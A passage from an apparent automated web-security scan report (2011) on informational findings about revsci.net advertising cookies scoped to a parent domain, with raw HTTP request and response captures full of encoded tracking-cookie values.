rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT1o+KPbckpam45pexdLfiwJPJ3ppfTsioboe+cnDDJZgKgtQtXa1p7mjRWANNLdKKeG1pdtoEg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:09:48 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/4030732.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_SPKp="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9RC0SyMoveM9OR5om4StALLEl9sEMKhnx1SF6IV+6n3UrBya8a69EYYEUz6/4+37SdpFD0dQv9OtEVVUutNbzybfVtVyr29MoWCXAb9pqFvHwGU7iNYcWZUGKQykfuJiPy1/q1nsMEVhflgYHiCgVE45SBrzZnPb52HR1/e6BAPCICqFXmsGq8SwyqGtsnMcza6eADHAVj+BOaVVJVPCroydsXBvlW40lXekvb/jgYYfyuHGvFhHKPgINaIn5K+3JiOnhZNsDREruliiset+iOha1rK86fldT1+kkVbq2DimGtVzdpMdp2rSqVCaEC5ngLb0CtlSR10nzIMHnlhGaKcLzLd4vywGjg9sIdlQbr1mBCBwJ6nqv9jm40yoVvMrtM23pGDJq1J5spi94yvq71egfDeI6j2Pk1v3oRB3QDzVUEhnwYVRu/y2PQ0JiQ/bAaUi83363VlihxXOybGUU8MdDiFd9Bj8a3uLUY6a4VUTehFnkNqF0LMqTOHzfENb+LcvTEer89fE1+CVDYchQtsVgF4gkPY6VD/n1xt/5X6Pl0rihMh0EYppVeWK6DipiX1JA6G3xDSt0GkFZl2CAmWx59JSrewaMDmoG3OIQwsJjjjKImS0gmvCpWQG7+PFsuFcJaRWrqWmANFUTh+4Tyj3eGgDMZrnMpnKOZgO546cR53G6hl9mNemOVL/qDBg9BCa4X/DwwZptOwc7c/+AHcwBwY4Fc4KzMimGhd5pcsoD0Kzk+u/aHoAxsPju9LD47qgUjnWN1Ml6mot4vbr5+V8rl6SiuGpMMv0mmflNrsIQv4SHzTTCdw1t6lz41W707MccCk7yFFnFXCb6ffh8xhCrliipRUE/jUuqm5JsCk9DFTIOEscfOGdCdCg8hMcJU8PMbF545KejeJCScgwJmiW4Fupl4B1EwjfFjEtmwapcW9wyVk74GyPeJvPg7bKjmtlHjEfmZJG/Zz9LpV1mCP+R1J8pSG/5PjrO+DB8DBd5UX1VnaRFfu1ogVnw8qTLBH7nI46vdWr19SfGLML8gl36DrkQ9iPWakBp+MHeIoaSPd6Vn+k6Y8Cn0Mv5tRt6wBVldis09BQmm9nAhma5+60qqPT7qEcJBdRs4UX4EnAp/ywXtHUMNW3gh/DuqihQu5+QRNDWzVlXHdxa8T/bfGHjCj5LwexAscRQK/kh0Y1yV77+9luf5ABzSSrmJCH4FbBDafLp5fA+DyyoEAGK5oBU6C7RZZk+GLrboKUuEXjKjzpOg79f5suzDI75pN2CrDnmBaJULqO5G+9HNo1b9wLicldijzd1Yy3AY82LlYL6uPDXYlCWyw=="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/RJ/0QxWQt7r3J5g8xDU6JaMynS8ksgRgB8jk91VLflfiDnqu8ciZ2S0bx7yq9wHoxUgmnQPwCvSfZ3AzY1r/NL4lX4uMW9YtAPlFtmBeW7jJGt0QPREYIyhxiuFjB+72rYBGcXUarYY4e78frT42oRHQSd2f/QPNIZ3Kahfg4wx3lj42h0CPneIW7y4LROPr/qG6zmbFeubH13IV7OkgkJ8/7A3eA5O7hup/I8Z9QKUSDhKPwX0yZP4XvWvoHdGSGa2dJv5lKeAXEaxjxJkFt1T/bGHYEGuaAKkz185ssgB5GhvI640MvWIsTsRLYyExq8/dgs6MexjRzkj+GVRKHeGk8MHRVdf5Y9PZRmBf1yg6g0W10anezao0OFKA4nVWvw6MJHKThOdg+pLb3D2z3tqnyFXCkjT3VlPbQ0xXcZR7ytZyQ4wUHcZ/5vG/QPlxDCP7UaVebL64UG2TEpq9KTR7DncAQ4uCzkDlhoc6GZH7EjswUp6Iry8Hu1rbFvqMo2NNx6hm77ml51IvYRzPSqYjHU8tmfwrjFIzyBep8zCJrS16WRn+QbsWytF5N+xA8wjnH1SOWqwI/yvBg5XRhC/Kh5TwB/+cTk3WeZetbPi71suL456HAdkY7jJ3YTUJ8gpTWx7jbH0yI5CHT++q4iGfp5SirhZLkEYnO1Sg3hiQjRVWukbIdcqpH46sBek97AsRql5yAuXcr5DEAPtipAeIm5xCzYYScnFbp6HQKIn3ZCIAxVD9Vy1o3c+OV2CXK54Y120ggsATec3mULe33CQI8vGt4zAbzaZcYC/FFrFCED2o9JEJ8zjoe78vSR0ryqw0Zf34JytsCTbsmD8D2hfTDhkiMNu/wQtKiKfMWgM3Du2pA6s1xl63lOviGk7qx5ELFL/2HqVSObK/KmjV6g5L6Xn8jMa4C4NHlHkE7CUy7PmbwYue/iRiPmR6S1ELt/+xEp+0Ufax03GSmLhQEwB1xC3yrWl+Har/mgz88GEws5Yzj7NbIhHXZg6ddGRMrf2X/Hzwi7Dib6ZAHkFcWoihke0/EwE9TuzL5Mi6OHixYoTRPi4BAc8lAs2xVidXGM5jGYEfYJwThGzYbk3mUs48A2q1dG2RDS/gaf3Ia6tf4K3fVgJ1XR1RWNZHVOLUu7UJiypMeKdV7TAWMUDxK6TwsPNT4eVMOgMpy2kKKZzsKGduJPV8NbziG4AQCdmcKvR5c5TAqy1dapdes3AOlD15IYQ/qwjiLMb5O62OYLb5dYSl7wfdLYgVwvPYUFiCuYn/0gFJvjtdZzQvNu9tkC03Ej3qi93oTixpOt1C39JI3wIF0CxxesH7MF7KhQMDpJVCiabi3uwQWMNtPBiRNinLB7d/ayzOczQoheHj2nLo/rvGftJGBlXBDia6jf4tmc/szp4Fe+iQTob14feLet63DolBB0KfPQc0chAmqQfKRSJTz4d3SC6cwiU+CespVsvrMXjpp5nqxOpPl5Z/ASOBjNACjLT60yoG0mQTo/HsT2bPyHSmEhcIw0bH2rGSFQVStNSm7CbhR8dX05UqQqCFWZ/9ja4z388/+IiuuP2ld6sBhkl4QIA+aqtJVCnL3XLFSgLZHd1m1HnIt95MM2/2Pa+OSo67q+6ni0Tl/fRB6FxpVuNgB20pdtloGZZo60RLfAFNmvQuTX54QGrM1d9zhugoTlwtpdB7Oql9vLrz46cuSf02549u5LRtITw74V6E2Bw4NknyBFLAcIoOVYNYN"; rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJ4QsJCe25ayViGymJW18v6oxo5TQQ/CGgK6F8nxcD/xw6JhTybIZwS4Eca2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFeddzYMSGLneI5567GeW6vbj+wWQEAWvERBw6DjPQ4L4Uubj0NaY9wI2KrzCfuCquS5+0mtq0blYCbbpeq91vpEp6PLHFjL00+eBC86WjLf8zGKgiUktukRMj4LRehj1yYj7ERIGS0GygMLjYe9onk6NwppmDLglt0tZ0xWuqUCkoeNenYu7v0FpQZ2Odr0Z+vQB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGVA0G9iNfakPzZvmfKPy95K8ih9mXMMCtdrIvcMnFkigtQN54dgYR7w1LbcvBOawhkZ/L92bTvudQtQPxONyOZ7HikgclZI5yKwuxe70WcSpaG/n1/A41enPmYXILccTgptCeFmnyrhXXudQBQYZNLCyUoCBHHWapQeg3j+zvKN2qENTpU38nR9ZeBXjA1G3G/+2zB8mfG804/L5qC2jvWS7bVfjgWA6KfmauLb+LawxWEWEfwxu2nkMx6VJoWDoK8dGCvVr+d13QHiJp7MM0oLg8NfB6byVwxEXif0z

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT1o+KPbckpam45pexdLfiwJPJ3ppfTsioboe+cnDDJZgKgtQtXa1p7mjRWANNLdKKeG1pdtoEg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:09:48 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:09:47 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.154. http://pix04.revsci.net/I10985/b3/0/3/1008211/411814556.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/411814556.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cLlXjjhFLBrIbl2lJ/5FpXMpx8c0GKZrUAr7cCcVeLNbbQuRNOdLX2iFZDeIEyjdOSph5SNuEaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCS9QS5To51qJ+p39UCrWLj3B0M2CF0kB1krJQf+cRsNXnc5UwNIYROh1WMCYBqLdNHvxCYMTtXa1J8nLfpm0AIgPmN/9qTBoFg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:59:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/411814556.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9